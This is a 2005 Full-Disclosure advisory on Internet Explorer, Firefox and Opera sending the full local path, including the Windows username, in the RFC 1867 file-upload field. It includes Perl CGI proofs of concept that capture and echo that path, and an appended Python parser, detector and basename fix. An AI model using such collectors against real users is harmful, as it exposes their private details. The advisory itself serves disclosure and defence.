Multi browser sensitive information disclosure

I. DESCRIPTION:

Mr. upken disclosed this issue publicly on 19th Feb. 2005. Here is his advisory (language is Japanese):
http://xxx.upken.jp/report/ieup/

I have a few additional details to add to his original advisory.

II. IMPACT:

Disclosure of sensitive information to an unauthorised user.

III. TECHNICAL DETAILS:

RFC1867 is the standard definition of that "Browse..." button that you use to upload files to a Web server. It introduced the INPUT field type="file", which is that button, and also specified a multipart form encoding which is capable of encapsulating files for upload along with all the other fields on an upload form.

As Mr. upken has mentioned in his advisory, there is a weakness in "Form-based File Upload in HTML". "When we use Internet Explorer", he says, "secret or sensitive information can be exposed by malicious people."

I have tested some examples, and found that Firefox, Opera, and Internet Explorer have a weakness (tested on Windows XP SP2).

IV. Proof of Concept [A].

server-side Perl CGI (ask.cgi)
- ---------------------------
#!/usr/bin/perl
print "Content-Type: text/html\n\n";
# refuse oversized uploads
die if $ENV{CONTENT_LENGTH} > 100*1024;
$objectname = "RFC1867";
# the first line of the multipart body is the boundary
$boundary = <STDIN>;
$boundary =~ s/\r\n//;
# look for the part header of the file field and keep everything after "filename="
while (<STDIN>) {
    if ($_ =~ /$objectname/) {
        s/\r\n//;
        s/"//g;
        @dum = split(/filename=/, $_);
        $rfc1867 = $dum[@dum - 1];
    }
}
$rfc1867 = &Filtertxt($rfc1867);
print "$rfc1867\n";
exit(0);

sub Filtertxt {
    local($ft) = @_;
    # strip characters that would be dangerous to echo into HTML
    $ft =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
    return($ft);
}
- ---------------------------

client-side FORM.
- ---------------------------
- ---------------------------

NOTE: Method is "POST". When we upload a file, %USERNAME%, path, etc. is disclosed. I guess that only IE has a weakness.

V. Proof of Concept [B].

server-side Perl CGI (named ask2.cgi)
- ---------------------------
#!/usr/bin/perl
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
    # reads inputted variables through POST
    read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
} else {
    # reads inputted variables through GET
    $buffer = $ENV{'QUERY_STRING'};
}
# splits the variables at &
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
    # sets the value and name of each var
    ($name, $value) = split(/=/, $pair);
    # makes each + into a space
    $value =~ tr/+/ /;
    # URL decode
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    # filter out bad characters & # < > " '
    $value = &Filtertxt($value);
    # sets the variables in a hash
    $FORM{$name} = $value;
}
# print html
print "Content-Type: text/html\n";
print "\n";
print "$FORM{'XB'}\n";
print "\n";
print "$FORM{'RFC1867'}\n";
exit(0);

sub Filtertxt {
    local($ft) = @_;
    # strip characters that would be dangerous to echo into HTML
    $ft =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
    return($ft);
}
- ---------------------------

client-side FORM.
- ---------------------------
- ---------------------------

NOTE: Method is "GET". When we try to upload a file, %USERNAME%, path, etc. is disclosed. I guess that both Opera and IE have a weakness.

VI. Proof of Concept [C].

server-side Perl CGI is the same as in Proof of Concept [B].

client-side FORM.
- ---------------------------
- ---------------------------

NOTE: Method is "GET". When we try to upload a file, %USERNAME%, path, etc. is disclosed. I guess that all of Firefox, Opera and IE have a weakness, using evil JavaScript scripting.

VII. Other browsers on other OSes.

Not tested. But......

VIII. Is this a vulnerability?

I once used Internet Explorer as an FTP tool. Today, when I was testing PoC3, browsing for an upload file using Firefox, I found "MyNetwork - ftp02.websamba.com - mhtmlbug - scriptkitty.jpg" and uploaded it to another server. Then my monitor displayed

C:\Documents and Settings\%USERNAME%\Local Settings\Temporary Internet Files\Content.IE5\YB6J6PY3\scriptkitty[4].jpg

Oh, no. YB6J6PY3! It is no matter. I guess this is NOT a vulnerability, maybe.

IX. Workaround

Do not upload any file to an untrusted server.
Do not attach any file (while sending webmail, posting to a ML, etc.).
Use Firefox with JavaScript disabled.

X. Credit

Discovery: upken
Additional Research: bitlance winter

BEST REGARDS.

-- 
bitlance winter

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
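The RFC 1867 body that ask.cgi reads above, as an added example that is not part of the original post: a small Python parser (not the advisory's Perl) that pulls the filename= parameter out of a constructed multipart body, a check that tells a defender the client sent its local path, and the server-side basename fix that ask.cgi lacks. The boundary, field names, body bytes and the Windows path are all constructed placeholders; the GET variants in [B] and [C] carry the same filename value in the query string, so the same two functions apply there.

```python
import re

# Constructed sample RFC 1867 multipart/form-data body. Browsers of the era put the
# selected file's full local path into filename=; the path here is a made-up
# placeholder shaped like the advisory's (user profile dir, Content.IE5 cache).
BOUNDARY = b"----RFC1867boundary"
SAMPLE_BODY = (
    b"------RFC1867boundary\r\n"
    b'Content-Disposition: form-data; name="XB"\r\n\r\n'
    b"hello\r\n"
    b"------RFC1867boundary\r\n"
    b'Content-Disposition: form-data; name="RFC1867"; '
    b'filename="C:\\Documents and Settings\\someuser\\Local Settings\\'
    b'Temporary Internet Files\\Content.IE5\\EXAMPLE1\\scriptkitty[4].jpg"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0 fake jpeg bytes\r\n"
    b"------RFC1867boundary--\r\n"
)

def parse_multipart(body, boundary):
    """Return {field name: (filename or None, data)} for every part of the body."""
    parts = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):
            break                                   # closing "--boundary--"
        headers, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'\bname="([^"]*)"', headers)      # \b keeps 'filename=' out
        filename = re.search(rb'filename="([^"]*)"', headers)
        parts[name.group(1).decode()] = (filename.group(1).decode() if filename else None,
                                         data[:-2] if data.endswith(b"\r\n") else data)
    return parts

def discloses_client_path(filename):
    """Detection check: a separator or drive letter in filename= means the client
    sent its local path, which is exactly what ask.cgi echoes back."""
    return bool(re.search(r"[\\/]|^[A-Za-z]:", filename))

def safe_filename(filename):
    """Server-side fix: keep only the last path component (both '\\' and '/' count
    as separators) so a client path never reaches logs, storage or the response."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base in ("", ".", ".."):
        raise ValueError("empty or relative filename")
    return base

if __name__ == "__main__":
    raw, _ = parse_multipart(SAMPLE_BODY, BOUNDARY)["RFC1867"]
    print("browser sent:", raw, "| leaks path:", discloses_client_path(raw))
    print("server should keep:", safe_filename(raw))
```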